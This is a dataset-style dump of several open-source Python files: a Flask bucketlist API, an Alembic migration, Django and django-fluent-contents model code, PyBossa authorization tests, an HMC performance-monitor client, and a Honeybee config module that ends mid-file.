code stringlengths 3 1.05M | repo_name stringlengths 5 104 | path stringlengths 4 251 | language stringclasses 1 value | license stringclasses 15 values | size int64 3 1.05M |
|---|---|---|---|---|---|
from flask import request
from flask.ext.restful import Resource
from .decorators import auth
from .helpers import *
from .models import User, BucketList, BucketListItem
class LoginUser(Resource):
'''
Manage responses to user requests.
URL:
/api/v1/auth/login/
Methods:
POST
'''
def post(self):
'''
Authenticates a user.
Returns:
json: message indicating Authentication Token or an error message
'''
username = request.form.get('username')
password = request.form.get('password')
if username and password:
if auth.valid_username(username):
if auth.valid_password(username, password):
user_data = {'username': username, 'password': password}
secret_key = current_app.config.get('SECRET_KEY')
token = jwt.encode(user_data, secret_key)
return {'token': token}, 200
else:
return messages['password_incorrect'], 406
else:
return messages['username_not_found'], 406
else:
return messages['user_pass_blank'], 406
class RegisterUser(Resource):
'''
Manage responses to user requests.
URL:
/api/v1/auth/register/
Methods:
POST
'''
def post(self):
'''
Register a user.
Returns:
json: message indicating the username has been registered or not
'''
username = request.form.get('username')
password = request.form.get('password')
if username and password:
if not auth.valid_username(username):
user = User(username, password)
return (get_user(user), 201) \
if save_model(user) else (messages['not_registered'], 400)
else:
return messages['user_exist'], 406
else:
return messages['user_pass_blank'], 406
class SingleBucketList(Resource):
'''
Manage responses to single bucketlists requests.
URL:
/api/v1/bucketlists/<id>/
Methods:
GET, PUT, DELETE
'''
@auth.user_is_login
@auth.bucketlist_exist
def get(self, id):
'''
Retrieve the bucketlist using an id.
Args:
id: The id of the bucketlist to be retrieved (required)
Returns:
json: The bucketlist with its content
'''
bucketlist = BucketList.query.filter_by(
id=id).first()
bucketlist_output = get_bucketlist(bucketlist)
return {'data': bucketlist_output}, 200
@auth.user_is_login
@auth.bucketlist_exist
def put(self, id):
'''
Updates the bucketlist using an id.
Args:
id: The id of the bucketlist to be updated (required)
Returns:
json: message indicating Bucketlist has been updated
'''
name = request.form.get('name')
token = request.headers.get('Token')
current_user = get_current_user_id(token)
check_bucketlist_name = BucketList.query.filter_by(
name=name, created_by=current_user).first()
if not check_bucketlist_name:
bucketlist = BucketList.query.filter_by(id=id).first()
bucketlist.name = name
return (get_bucketlist(bucketlist), 200) if update_database() \
else (messages['bucketlist_not_updated'], 400)
else:
return messages['bucketlist_exist'], 406
@auth.user_is_login
@auth.bucketlist_exist
def delete(self, id):
'''
Delete the bucketlist with the specified id.
Args:
id: The id of the bucketlist to be deleted (required)
Returns:
json: message indicating Bucketlist has been deleted
'''
bucketlist = BucketList.query.filter_by(id=id).first()
return (messages['bucketlist_deleted'], 204) \
if delete_model(bucketlist) \
else (messages['bucketlist_not_deleted'], 400)
class AllBucketLists(Resource):
'''
Manage responses to bucketlists requests by a user.
URL:
/api/v1/bucketlists/
Methods:
GET, POST
'''
@auth.user_is_login
def get(self):
'''
Retrieve all bucketlists for a particular user.
Args:
q: Searches bucketlists by name (optional)
limit: Limit number of retrieved bucketlists per page (optional)
page: Number of pages to contain retrieved bucketlists (optional)
Returns:
json: All bucketlists with their content
'''
params = request.args.to_dict()
limit = int(params.get('limit', 20))
limit = 100 if int(limit) > 100 else limit
search_by = params.get('q', '')
page = int(params.get('page', 1))
token = request.headers.get('Token')
user_id = get_current_user_id(token)
search_results = BucketList.query.filter_by(
created_by=user_id).filter(BucketList.name.like('%{}%'.format
(search_by)))
all_bucketlist = search_results.paginate(
page=page, per_page=limit, error_out=False)
next_page = str(request.url_root) + 'api/v1/bucketlists?' + \
'limit=' + str(limit) + '&page=' + str(page + 1) \
if all_bucketlist.has_next else None
previous_page = request.url_root + 'api/v1/bucketlists?' + \
'limit=' + str(limit) + '&page=' + str(page - 1) \
if all_bucketlist.has_prev else None
bucketlist_output = [get_bucketlist(
bucketlist) for bucketlist in all_bucketlist.items]
return {'data': bucketlist_output,
'pages': all_bucketlist.pages,
'previous_page': previous_page,
'next_page': next_page}, 200
@auth.user_is_login
def post(self):
'''
Create a new bucketlist for a particular user.
Args:
Params:
name: Name for the bucketlist (required)
Header:
Token: Authentication Token for the User (required)
Returns:
json: message indicating bucketlist has been created or not
'''
name = request.form.get('name')
token = request.headers.get('Token')
current_user = get_current_user_id(token)
bucketlist = BucketList.query.filter_by(
name=name, created_by=current_user).first()
if name:
if bucketlist:
return messages['bucketlist_exist'], 406
else:
bucketlist = BucketList(name, current_user)
return (get_bucketlist(bucketlist), 201) if \
save_model(bucketlist) \
else (messages['bucketlist_not_saved'], 400)
else:
return messages['no_bucketlist_name'], 406
class AllBucketListItems(Resource):
'''
Manage responses to bucketlistitem requests by a user.
URL:
/api/v1/bucketlists/<id>/items/
Methods:
POST
'''
@auth.user_is_login
@auth.bucketlist_exist
def post(self, id):
'''
Create a new bucketlist item for a particular bucketlist.
Args:
id: The id of the bucketlist which an item is being added
Parameters:
name: Name for the bucketlist item (required)
Header:
Token: Authentication Token for the User (required)
Returns:
json: message indicating bucketlist item has been created or not
'''
name = request.form.get('name')
bucketlist_item = BucketListItem.query.filter_by(
name=name, bucketlist_id=id).first()
if name:
if bucketlist_item:
return messages['bucketlist_item_exist'], 406
else:
bucketlist_item = BucketListItem(name=name, bucketlist_id=id)
return (get_single_bucketlist_item(bucketlist_item), 201) \
if save_model(bucketlist_item) \
else (messages['bucketlist_item_not_saved'], 400)
else:
return messages['no_bucketlist_item_name'], 406
class SingleBucketListItem(Resource):
'''
Manage responses to single bucketlistitem requests by a user.
URL:
/api/v1/bucketlists/<id>/items/<item_id>
Methods:
PUT, DELETE
'''
@auth.user_is_login
@auth.bucketlist_exist
@auth.bucketlist_item_exist
def put(self, id, item_id):
'''
Updates a single bucketlistitem given the item_id
and the bucketlist_id
URL:
/api/v1/bucketlists/<id>/items/<item_id>
Args:
item_id: The id of the bucketlist item to be updated (required)
id: The id of the bucketlist whose item is being updated (required)
Parameters:
name: The name for the bucketlist item (optional)
done: The status of the bucketlist item (optional)
Header:
Token: Authentication Token for the User (required)
Returns:
json: message indicating bucketlist_item has been updated or not
'''
bucketlist_item = BucketListItem.query.filter_by(
id=item_id, bucketlist_id=id).first()
name = request.form.get('name')
done = request.form.get('done')
done = True if str(done).lower() == 'true' else False
check_bucketlist_item_details = BucketListItem.query.filter_by(
name=name, id=item_id, bucketlist_id=id, done=done).first()
if not check_bucketlist_item_details:
bucketlist_item.name = name
bucketlist_item.done = done
return (get_single_bucketlist_item(bucketlist_item), 200) \
if update_database() \
else (messages['bucketlist_item_not_updated'], 400)
else:
return messages['bucketlist_item_exist'], 406
@auth.user_is_login
@auth.bucketlist_exist
@auth.bucketlist_item_exist
def delete(self, id, item_id):
'''
Deletes a single bucketlistitem given the item_id
and the bucketlist_id.
URL:
/api/v1/bucketlists/<id>/items/<item_id>
Args:
item_id: The id of the bucketlist item to be deleted (required)
id: The id of the bucketlist whose item is being deleted (required)
Header:
Token: Authentication Token for the User (required)
Returns:
json: message indicating bucketlist_item has been deleted or not
'''
bucketlist_item = BucketListItem.query.filter_by(
id=item_id, bucketlist_id=id).first()
return (messages['bucketlist_item_deleted'], 204) \
if delete_model(bucketlist_item) else \
(messages['bucketlist_item_not_deleted'], 400)
| andela-hoyeboade/bucketlist-api | app/resources.py | Python | mit | 11,032 |
"""alter database for mysql compatibility
Revision ID: 9be372ec38bc
Revises: 4328f2c08f05
Create Date: 2020-02-16 15:43:35.276655
"""
from alembic import op
import sqlalchemy as sa
from docassemble.webapp.database import dbtableprefix, dbprefix, daconfig
import sys
# revision identifiers, used by Alembic.
revision = '9be372ec38bc'
down_revision = '4328f2c08f05'
branch_labels = None
depends_on = None
def upgrade():
if dbprefix.startswith('postgresql') and not daconfig.get('force text to varchar upgrade', False):
sys.stderr.write("Not changing text type to varchar type because underlying database is PostgreSQL\n")
else:
op.alter_column(
table_name='userdict',
column_name='filename',
type_=sa.String(255)
)
op.alter_column(
table_name='userdictkeys',
column_name='filename',
type_=sa.String(255)
)
op.alter_column(
table_name='chatlog',
column_name='filename',
type_=sa.String(255)
)
op.alter_column(
table_name='uploads',
column_name='filename',
type_=sa.String(255)
)
op.alter_column(
table_name='uploads',
column_name='yamlfile',
type_=sa.String(255)
)
op.alter_column(
table_name='objectstorage',
column_name='key',
type_=sa.String(1024)
)
op.alter_column(
table_name='speaklist',
column_name='filename',
type_=sa.String(255)
)
op.alter_column(
table_name='shortener',
column_name='filename',
type_=sa.String(255)
)
op.alter_column(
table_name='shortener',
column_name='key',
type_=sa.String(255)
)
op.alter_column(
table_name='machinelearning',
column_name='key',
type_=sa.String(1024)
)
op.alter_column(
table_name='machinelearning',
column_name='group_id',
type_=sa.String(1024)
)
op.alter_column(
table_name='globalobjectstorage',
column_name='key',
type_=sa.String(1024)
)
op.create_index(dbtableprefix + 'ix_uploads_yamlfile', 'uploads', ['yamlfile'])
def downgrade():
op.alter_column(
table_name='userdict',
column_name='filename',
type_=sa.Text()
)
op.alter_column(
table_name='userdictkeys',
column_name='filename',
type_=sa.Text()
)
op.alter_column(
table_name='chatlog',
column_name='filename',
type_=sa.Text()
)
op.alter_column(
table_name='uploads',
column_name='filename',
type_=sa.Text()
)
op.alter_column(
table_name='uploads',
column_name='yamlfile',
type_=sa.Text()
)
op.alter_column(
table_name='objectstorage',
column_name='key',
type_=sa.Text()
)
op.alter_column(
table_name='speaklist',
column_name='filename',
type_=sa.Text()
)
op.alter_column(
table_name='shortener',
column_name='filename',
type_=sa.Text()
)
op.alter_column(
table_name='shortener',
column_name='key',
type_=sa.Text()
)
op.alter_column(
table_name='machinelearning',
column_name='key',
type_=sa.Text()
)
op.alter_column(
table_name='machinelearning',
column_name='group_id',
type_=sa.Text()
)
op.alter_column(
table_name='globalobjectstorage',
column_name='key',
type_=sa.Text()
)
op.drop_index(dbtableprefix + 'ix_uploads_yamlfile', table_name='uploads')
| jhpyle/docassemble | docassemble_webapp/docassemble/webapp/alembic/versions/9be372ec38bc_alter_database_for_mysql_compatibility.py | Python | mit | 3,895 |
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.contrib import messages
from django.contrib.admin.models import DELETION, LogEntry
from django.contrib.admin.options import get_content_type_for_model
from django.core.urlresolvers import NoReverseMatch, Resolver404, resolve, reverse
from django.http import HttpResponseRedirect
from django.utils.encoding import force_text
from django.utils.translation import ugettext_lazy as _
from .models import Post
class RedirectOnDeleteMiddleware(object):
model = Post
def is_post_detail_view(self, request):
try:
matched_url = resolve(request.path_info)
except Resolver404:
return False
if matched_url and not matched_url.app_name == self.model._meta.app_label \
and matched_url.url_name == 'post_detail':
return True
def process_response(self, request, response):
if response.status_code != 404:
return response
if not self.is_post_detail_view(request):
return response
if request.user.is_staff:
try:
log_entry = LogEntry.objects.filter(user=request.user).order_by('-pk')[0]
except IndexError:
log_entry = None
if log_entry and log_entry.action_flag == DELETION \
and log_entry.content_type_id == get_content_type_for_model(self.model).pk:
try:
redirect_url = reverse('blog:posts_list')
except NoReverseMatch:
redirect_url = '/'
msg = _('The %(name)s "%(obj)s" was deleted.') % {
'name': force_text(self.model._meta.verbose_name),
'obj': log_entry.object_repr
}
messages.error(request, msg)
return HttpResponseRedirect(redirect_url)
return response
| mishbahr/staticgen-demo | staticgen_demo/blog/middleware.py | Python | bsd-3-clause | 1,941 |
import django
from django.contrib.contenttypes.fields import GenericRel, GenericRelation
from django.contrib.contenttypes.models import ContentType
from django.db import DEFAULT_DB_ALIAS
from django.db.models.query_utils import Q
from django.utils.functional import lazy
from django.utils.text import capfirst
from fluent_contents import appsettings
from fluent_contents.forms.fields import PlaceholderFormField
from .db import ContentItem, Placeholder
__all__ = ("PlaceholderRelation", "ContentItemRelation", "PlaceholderField")
# The PlaceholderField is inspired by Django CMS
# Yet uses a different methology to access the fields.
#
# In Django CMS it's a ForeignKey to Placeholder.
# Here, the Placeholder has a GenericForeignKey to the parent - hence it will be deleted when the parent is removed -
# so the PlaceholderField is merely a reverse GenericRelation.
#
# In the admin, the logic of the PlaceholderEditor code can be reused.
class PlaceholderRelation(GenericRelation):
"""
A :class:`~django.contrib.contenttypes.generic.GenericRelation` which can be applied to a parent model that
is expected to be referenced be a :class:`~fluent_contents.models.Placeholder`. For example:
.. code-block:: python
class Page(models.Model):
placeholder_set = PlaceholderRelation()
"""
def __init__(self, **kwargs):
defaults = {
"limit_choices_to": Q(
parent_type=lazy(
lambda: ContentType.objects.get_for_model(Placeholder), ContentType
)()
)
}
defaults.update(kwargs)
super(PlaceholderRelation, self).__init__(
to=Placeholder,
object_id_field="parent_id",
content_type_field="parent_type",
**defaults
)
class ContentItemRelation(GenericRelation):
"""
A :class:`~django.contrib.contenttypes.generic.GenericRelation` which can be applied to a parent model that
is expected to be referenced by the :class:`~fluent_contents.models.ContentItem` classes. For example:
.. code-block:: python
class Page(models.Model):
contentitem_set = ContentItemRelation()
Adding this relation also causes the admin delete page to list the
:class:`~fluent_contents.models.ContentItem` objects which will be deleted.
"""
def __init__(self, **kwargs):
super(ContentItemRelation, self).__init__(
to=ContentItem,
object_id_field="parent_id",
content_type_field="parent_type",
**kwargs
)
def bulk_related_objects(self, objs, using=DEFAULT_DB_ALIAS):
# Fix delete screen. Workaround for https://github.com/django-polymorphic/django-polymorphic/issues/34
return (
super(ContentItemRelation, self)
.bulk_related_objects(objs)
.non_polymorphic()
)
class PlaceholderRel(GenericRel):
"""
The internal :class:`~django.contrib.contenttypes.generic.GenericRel`
that is used by the :class:`PlaceholderField` to support queries.
"""
def __init__(
self,
field,
to,
related_name=None,
related_query_name=None,
limit_choices_to=None,
):
# Note: all other args are provided for Django 1.9 compatibility
limit_choices_to = Q(
parent_type=lazy(
lambda: ContentType.objects.get_for_model(Placeholder), ContentType
)(),
slot=field.slot,
)
# TODO: make sure reverse queries work properly
super(PlaceholderRel, self).__init__(
field=field,
to=Placeholder,
related_name=None, # NOTE: must be unique for app/model/slot.
limit_choices_to=limit_choices_to,
)
class PlaceholderFieldDescriptor(object):
"""
This descriptor is placed on the PlaceholderField model instance
by the :func:`~PlaceholderField.contribute_to_class` function.
This causes ``instance.field`` to return a :class:`~fluent_contents.models.Placeholder` object.
"""
def __init__(self, slot):
"""Set the slot this descriptor is created for."""
self.slot = slot
def __get__(self, instance, instance_type=None):
"""Return the placeholder by slot."""
if instance is None:
return self
try:
placeholder = Placeholder.objects.get_by_slot(instance, self.slot)
except Placeholder.DoesNotExist:
raise Placeholder.DoesNotExist(
"Placeholder does not exist for parent {0} (type_id: {1}, parent_id: {2}), slot: '{3}'".format(
repr(instance),
ContentType.objects.get_for_model(
instance, for_concrete_model=False
).pk,
instance.pk,
self.slot,
)
)
else:
placeholder.parent = instance # fill the reverse cache
return placeholder
def __set__(self, instance, value):
if instance is None:
raise AttributeError("Descriptor must be accessed via instance")
if value == "-DUMMY-":
return
raise NotImplementedError(
"Setting Placeholder value is not supported, use Placeholder.objects.create_for_object() instead."
)
class PlaceholderField(PlaceholderRelation):
"""
The model field to add :class:`~fluent_contents.models.ContentItem` objects to a model.
:param slot: A programmatic name to identify the placeholder.
:param plugins: Optional, define which plugins are allowed to be used. This can be a list of names, or :class:`~fluent_contents.extensions.ContentPlugin` references.
:type slot: str
:type plugins: list
This class provides the form fields for the field. Use this class in a model to use it:
.. code-block:: python
class Article(models.Model):
contents = PlaceholderField("article_contents")
The data itself is stored as reverse relation in the :class:`~fluent_contents.models.ContentItem` object.
Hence, all contents will be cleaned up properly when the parent model is deleted.
The placeholder will be displayed in the admin:
.. image:: /images/admin/placeholderfieldadmin1.png
:width: 770px
:height: 562px
:alt: django-fluent-contents placeholder field preview
"""
rel_class = PlaceholderRel # Django 1.9
def __init__(self, slot, plugins=None, **kwargs):
"""
Initialize the placeholder field.
"""
self.slot = slot
super(PlaceholderField, self).__init__(**kwargs)
# See if a plugin configuration is defined in the settings
self._slot_config = (
appsettings.FLUENT_CONTENTS_PLACEHOLDER_CONFIG.get(slot) or {}
)
self._plugins = plugins or self._slot_config.get("plugins") or None
# Overwrite some hardcoded defaults from the base class.
# TODO: support blank: False to enforce adding at least one plugin.
self.editable = True
self.blank = True
def formfield(self, **kwargs):
"""
Returns a :class:`PlaceholderFormField` instance for this database Field.
"""
defaults = {
"label": capfirst(self.verbose_name),
"help_text": self.help_text,
"required": not self.blank,
}
defaults.update(kwargs)
return PlaceholderFormField(slot=self.slot, plugins=self._plugins, **defaults)
def contribute_to_class(self, cls, name, **kwargs):
"""
Internal Django method to associate the field with the Model; it assigns the descriptor.
"""
super(PlaceholderField, self).contribute_to_class(cls, name, **kwargs)
# overwrites what instance.<colname> returns; give direct access to the placeholder
setattr(cls, name, PlaceholderFieldDescriptor(self.slot))
# Make placeholder fields easy to find
# Can't assign this to cls._meta because that gets overwritten by every level of model inheritance.
if not hasattr(cls, "_meta_placeholder_fields"):
cls._meta_placeholder_fields = {}
cls._meta_placeholder_fields[name] = self
# Configure the revere relation if possible.
# TODO: make sure reverse queries work properly
if django.VERSION >= (1, 11):
rel = self.remote_field
else:
rel = self.rel
if rel.related_name is None:
# Make unique for model (multiple models can use same slotnane)
rel.related_name = "{app}_{model}_{slot}_FIXME".format(
app=cls._meta.app_label,
model=cls._meta.object_name.lower(),
slot=self.slot,
)
# Remove attribute must exist for the delete page. Currently it's not actively used.
# The regular ForeignKey assigns a ForeignRelatedObjectsDescriptor to it for example.
# In this case, the PlaceholderRelation is already the reverse relation.
# Being able to move forward from the Placeholder to the derived models does not have that much value.
setattr(rel.to, self.rel.related_name, None)
@property
def plugins(self):
"""
Get the set of plugins that this field may display.
"""
from fluent_contents import extensions
if self._plugins is None:
return extensions.plugin_pool.get_plugins()
else:
try:
return extensions.plugin_pool.get_plugins_by_name(*self._plugins)
except extensions.PluginNotFound as e:
raise extensions.PluginNotFound(
str(e)
+ " Update the plugin list of '{0}.{1}' field or FLUENT_CONTENTS_PLACEHOLDER_CONFIG['{2}'] setting.".format(
self.model._meta.object_name, self.name, self.slot
)
)
def value_from_object(self, obj):
"""
Internal Django method, used to return the placeholder ID when exporting the model instance.
"""
try:
# not using self.attname, access the descriptor instead.
placeholder = getattr(obj, self.name)
except Placeholder.DoesNotExist:
# Still allow ModelForm / admin to open and create a new Placeholder if the table was truncated.
return None
# Be consistent with other fields, like ForeignKey:
return placeholder.id if placeholder else None
| edoburu/django-fluent-contents | fluent_contents/models/fields.py | Python | apache-2.0 | 10,676 |
# -*- coding: utf8 -*-
# This file is part of PyBossa.
#
# Copyright (C) 2015 SciFabric LTD.
#
# PyBossa is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# PyBossa is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with PyBossa. If not, see <http://www.gnu.org/licenses/>.
from default import Test, assert_not_raises
from pybossa.auth import ensure_authorized_to
from nose.tools import assert_raises
from werkzeug.exceptions import Forbidden, Unauthorized
from mock import patch
from test_authorization import mock_current_user
class TestTokenAuthorization(Test):
auth_providers = ('twitter', 'facebook', 'google')
mock_anonymous = mock_current_user()
mock_authenticated = mock_current_user(anonymous=False, admin=False, id=2)
@patch('pybossa.auth.current_user', new=mock_anonymous)
def test_anonymous_user_delete(self):
"""Test anonymous user is not allowed to delete an oauth token"""
for token in self.auth_providers:
assert_raises(Unauthorized,
ensure_authorized_to, 'delete', 'token', token=token)
@patch('pybossa.auth.current_user', new=mock_authenticated)
def test_authenticated_user_delete(self):
"""Test authenticated user is not allowed to delete an oauth token"""
for token in self.auth_providers:
assert_raises(Forbidden,
ensure_authorized_to, 'delete', 'token', token=token)
@patch('pybossa.auth.current_user', new=mock_anonymous)
def test_anonymous_user_create(self):
"""Test anonymous user is not allowed to create an oauth token"""
for token in self.auth_providers:
assert_raises(Unauthorized,
ensure_authorized_to, 'create', 'token', token=token)
@patch('pybossa.auth.current_user', new=mock_authenticated)
def test_authenticated_user_create(self):
"""Test authenticated user is not allowed to create an oauth token"""
for token in self.auth_providers:
assert_raises(Forbidden,
ensure_authorized_to, 'create', 'token', token=token)
@patch('pybossa.auth.current_user', new=mock_anonymous)
def test_anonymous_user_update(self):
"""Test anonymous user is not allowed to update an oauth token"""
for token in self.auth_providers:
assert_raises(Unauthorized,
ensure_authorized_to, 'update', 'token', token=token)
@patch('pybossa.auth.current_user', new=mock_authenticated)
def test_authenticated_user_update(self):
"""Test authenticated user is not allowed to update an oauth token"""
for token in self.auth_providers:
assert_raises(Forbidden,
ensure_authorized_to, 'update', 'token', token=token)
@patch('pybossa.auth.current_user', new=mock_anonymous)
def test_anonymous_user_read(self):
"""Test anonymous user is not allowed to read an oauth token"""
for token in self.auth_providers:
assert_raises(Unauthorized,
ensure_authorized_to, 'read', 'token', token=token)
@patch('pybossa.auth.current_user', new=mock_authenticated)
def test_authenticated_user_read(self):
"""Test authenticated user is allowed to read his own oauth tokens"""
for token in self.auth_providers:
assert_not_raises(Exception,
ensure_authorized_to, 'read', 'token', token=token)
| geotagx/pybossa | test/test_authorization/test_token_auth.py | Python | agpl-3.0 | 3,924 |
# Copyright 2015, 2016 IBM Corp.
#
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from src.performance_capacity_monitor import JsonFilesDownload
from src.utility import HMCClientLogger,HTTPClient
import json
import time
import feedparser
import sys
log_object=HMCClientLogger.HMCClientLogger(__name__)
ROOT = "ManagedSystem"
CONTENT_TYPE = "application/atom+xml"
class LongTermMonitor:
def __init__(self, ip, managedsystem_id, x_api_session):
"""
initializes root,content_type and services
Args:
ip : ip address of HMC
managedsystem_id : UUID of ManagedSystem
x_api_session : session to be used
"""
self.service = "pcm"
self.root = ROOT
self.ip = ip
self.managedsystem_id = managedsystem_id
self.x_api_session = x_api_session
self.content_type = CONTENT_TYPE
def json_download_all_files(self, HTTP_object, feedparser_LTM, object_list):
"""
downloads all the available json files for Long term metrics
Args:
HTTP_object : HTTP Request object carrying the headers and URL
feedparser_LTM : feedparser object containing the entries of LTM
object_list : Available VIOS object List
"""
try:
print("press ctrl+c to exit")
for i in range(0,len(feedparser_LTM.entries)):
json_url_link=feedparser_LTM.entries[i].links[0].href
# Get the links for long term monitor json files and perform get request
HTTP_object.HTTPGet(url=json_url_link)
log_object.log_debug("response code for Long Term Monitor json file links %s" %(HTTP_object.response))
if not HTTP_object.response_b:
continue
# Downloading the json file
JsonFilesDownload.json_file(feedparser_LTM.entries[i].title, HTTP_object.response.text)
except KeyboardInterrupt:
return 5
def json_download_recent_files_phyp(self,HTTP_object,feedparser_LTM,object_list):
"""
downloads the recent json files for Long term metrics PHYP
Args:
HTTP_object : HTTP Request object carrying the headers and URL
feedparser_LTM : feedparser object containing the entries of LTM
object_list : Available VIOS object List
"""
timestamp_phyp=[]
# get timestamps of all the json files of category phyp
for j in range(0, len(feedparser_LTM.entries)):
if feedparser_LTM.entries[j].category=="phyp":
timestamp_phyp.append(feedparser_LTM.entries[j].links[0].href[154:160])
timestamp_phyp.sort()
for k in range(0, len(feedparser_LTM.entries)):
if(feedparser_LTM.entries[k].category=="phyp" and feedparser_LTM.entries[k].links[0].href[154:160]==timestamp_phyp[len(timestamp_phyp)-1]):
json_url=feedparser_LTM.entries[k].links[0].href
#print (feedparser_LTM.entries[i].links[0].href)
HTTP_object.HTTPGet(url=json_url)
log_object.log_debug(HTTP_object.response)
print("\nThe recent json file of Powerhypervisor : ")
JsonFilesDownload.json_file(feedparser_LTM.entries[k].title, HTTP_object.response.text)
break
def json_download_recent_files_vios(self,HTTP_object,feedparser_LTM,object_list):
"""
downloads the recent json files for Long term metrics VIOS
Args:
HTTP_object : HTTP Request object carrying the headers and URL
feedparser_LTM : feedparser object containing the entries of LTM
object_list : Available VIOS object List
"""
try:
timestamp_vios=[]
vios_names=self.get_virtualioserver_list(object_list)
#print(object_list)
for k in range(0,len(vios_names)):
#print(vios_names[k])
timestamp_vios.append([])
for j in range(0,len(vios_names)):
for i in range(0, len(feedparser_LTM.entries)):
if feedparser_LTM.entries[i].category==vios_names[j]:
timestamp_vios[j].append(feedparser_LTM.entries[i].links[0].href[156:162])
timestamp_vios[j].sort()
for j in range(0,len(vios_names)):
for i in range(0, len(feedparser_LTM.entries)):
if feedparser_LTM.entries[i].category==vios_names[j] and feedparser_LTM.entries[i].links[0].href[156:162]==timestamp_vios[j][len(timestamp_vios[j])-1]:
#print (feedparser_LTM.entries[i].links[0].href)
json_url=feedparser_LTM.entries[i].links[0].href
HTTP_object.HTTPGet(url=json_url)
log_object.log_debug(HTTP_object.response)
print("\nThe recent json file of VirtualIOserver :%s "%(vios_names[j]))
JsonFilesDownload.json_file(feedparser_LTM.entries[i].title, HTTP_object.response.text)
break
except TypeError:
log_object.log_warn("There are no VIOS available in the system")
def get_virtualioserver_list(self,object_list):
vios_names=[]
for i in range(0,len(object_list)):
vios_names.append("vios_%s"%(object_list[i].PartitionID.value()))
return vios_names
########################################
# GET THE LONG TERM MONITOR JSON FILES
########################################
def get_longtermmonitor(self,object_list):
'''
This function collects the long term monitor metrics of the HMC
'''
choice="y"
while choice=="y":
flag = 6
HTTP_object =HTTPClient.HTTPClient(self.service, self.ip, self.root, self.content_type, self.x_api_session)
# Make a get request for Long Term Monitor
HTTP_object.HTTPGet(append=self.managedsystem_id+"/RawMetrics/LongTermMonitor")
if not HTTP_object.response_b:
log_object.log_warn("Long Term Monitor not Enabled\n")
return
# The response of the get request is parsed using feedparser
feedparser_LTM = feedparser.parse(HTTP_object.response.text)
print("\n*******Options for Long Term Monitor Metrics*********\n")
option = input("This happens in a loop that repeats every 30 seconds \n 1.Download all the available json files \n 2.Download the recently generated json files \n 3.quit\n choose an option: ")
if option=="1":
flag = self.json_download_all_files(HTTP_object,feedparser_LTM,object_list)
if flag == 5:
continue
elif flag == 6:
print("Sleeps for 30 seconds")
time.sleep(30)
print("Refreshing after 30 seconds")
elif option=="2":
self.json_download_recent_files_phyp(HTTP_object,feedparser_LTM,object_list)
#print(object_list)
self.json_download_recent_files_vios(HTTP_object,feedparser_LTM,object_list)
print("Sleeps for 30 seconds")
time.sleep(30)
print("Refreshing after 30 seconds")
elif option == "3":
choice = "n"
#LongTermMonitor_object=LongTermMonitor('9.126.138.108','f8fbeb06-09e9-39a6-91e9-be80b39cae49',x_api_session)
#LongTermMonitor_object.get_longtermmonitor()
| PowerHMC/HmcRestClient | src/performance_capacity_monitor/LongTermMonitor.py | Python | apache-2.0 | 8,441 |
"""Honeybee configurations.
Import this module in every module that you need to access Honeybee configurations.
Usage:
import config
print config.radlibPath
print config.radbinPath
print config.platform
config.radbinPath = "c:/radiance/bin"
"""
from honeybee.config import *
from collections import namedtuple
import os
import sys
class Platform(object):
"""Identify how the script is currently executing.
0: Running as standard python script
1: Running inside grasshopper component
2: Running inside dynamo node
3: Running inside dynamo node from Revit
Usage:
platform = Platform(mute=True)
p = platform.platform
pId = platform.platformId
print "Platform is {} > {}.".format(p, pId)
>> Honeybee is running from gh. platform id: 1.
"""
def __init__(self, mute=False):
"""Find currect platform and platformId."""
self.__mute = mute
self.platform = None
"""Current platform that imports the libraries as a string.
Values:
None: Running as standard python script
'gh': Grasshopper
'ds': Dynamo
'rvt': Dynamo from inside Revit
"""
self.platformId = 0
"""Current platformId that imports the libraries as a string.
Values:
0: Running as standard python script
1: Grasshopper
2: Dynamo
3: Dynamo from inside Revit
"""
# created a named tuple for libraries
self._Libs = namedtuple("Libs", "Rhino Grasshopper Dynamo DesignScript")
self.libs = None
"""Collection of libraries for this platform.
Usage:
from honeybeex import config
gh = config.libs.Grasshopper
rc = config.libs.Rhino
"""
__cwd = os.getcwdu().lower()
if __cwd.find("rhino") > -1:
# It's running from inside grasshopper component
self.platform = "gh"
self.platformId = 1
elif __cwd.find("dynamo") > -1:
# It's running from inside dynamo script
self.platform = "ds"
self.platformId = 2
elif __cwd.find("revit") > -1:
# It's running from inside Revit from a Dynamo node
self.platform = "rvt"
self.platformId = 3
elif __cwd.find("python") == -1:
# Revit changes the directory to where the file is, if user change
# the revit file but doesn't close the Dynamo window! :|
self.platform = "rvt"
self.platformId = 3
if not mute:
print "Honeybee is running from {}. platform id: {}." \
.format(self.platform, self.platformId)
self.importGeometryLibraries()
@property
def isRevit(self):
"""Return True if platform is Revit."""
return self.platform == "rvt"
@property
def isDynamo(self):
"""Return True if platform is Dynamo Studio."""
return self.platform == "ds"
@property
def isGrasshopper(self):
"""Return True if platform is Grasshopper."""
return self.platform == "gh"
@property
def isRevitOrDynamo(self):
"""Return True if platform is Revit or Dynamo Studio."""
return self.isRevit or self.isDynamo
def importGeometryLibraries(self):
"""
Import geometry libraries based on platform.
This approch will avoid importing libraries for several times.
"""
# import libraries once in config and share it between all the geometry libraries
if not self.__mute:
print "Importing geometry libraries..."
if self.platformId == 1:
# Import Rhino and Grasshopper
try:
gh = __import__('Grasshopper')
if not self.__mute:
print "Grasshopper imported under config.libs.Grasshopper"
rc = __import__('Rhino')
if not self.__mute:
print "Rhino imported under config.libs.Rhino"
except ImportError as e:
print "Failed to import geometry libraries {}".format(e)
else:
# Assign Rhino and Grasshopper to the libraries
self.libs = self._Libs(rc, gh, None, None)
if self.platformId == 2 or self.platformId == 3:
try:
import clr
clr.AddReference('DynamoCore')
clr.AddReference('ProtoGeometry')
clr.AddReference('ProtoInterface')
import Autodesk.DesignScript as ds
